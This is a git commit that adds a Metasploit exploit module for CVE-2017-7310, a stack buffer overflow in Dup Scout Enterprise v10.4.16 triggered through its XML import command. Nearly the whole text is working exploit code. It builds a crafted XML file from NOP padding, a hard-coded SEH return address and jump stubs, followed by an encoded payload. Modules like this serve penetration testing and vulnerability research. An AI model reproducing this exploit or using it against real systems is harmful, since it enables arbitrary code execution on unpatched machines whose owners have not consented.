Dup Scout Import Command Buffer Overflow

2018-01-24 20:47:46 +00:00 · 2018-01-24 20:47:46 +00:00 · 4cd5801e6f
parent c1ff0c1e00
commit 4cd5801e6f
1 changed files with 71 additions and 0 deletions
--- a/modules/exploits/windows/fileformat/dupscout_xml.rb
+++ b/modules/exploits/windows/fileformat/dupscout_xml.rb
@ -0,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow',
+      'Description'     => %q(
+        This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16
+        by using the import command option to import a specially crafted xml file.
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Daniel Teixeira'
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-7310' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Payload'         =>
+        {
+          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
+          'StackAdjustment' => -3500
+        },
+      'Targets'         =>
+        [
+          ['Windows Universal', { 'Ret' => 0x651BB77A  } ]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Mar 29 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
+      ])
+  end
+
+  def exploit
+    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
+    jmp = "\xFF\xE0" # JMP ESP
+
+    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
+    buffer << "\x90" * 1560
+    buffer << [target.ret].pack('V')
+    buffer << "\x90" * 16
+    buffer << esp
+    buffer << jmp
+    buffer << "\x90" * 70
+    buffer << payload.encoded
+    buffer << "\x90" * 5000
+    buffer << "\n</classify>"
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+  end
+end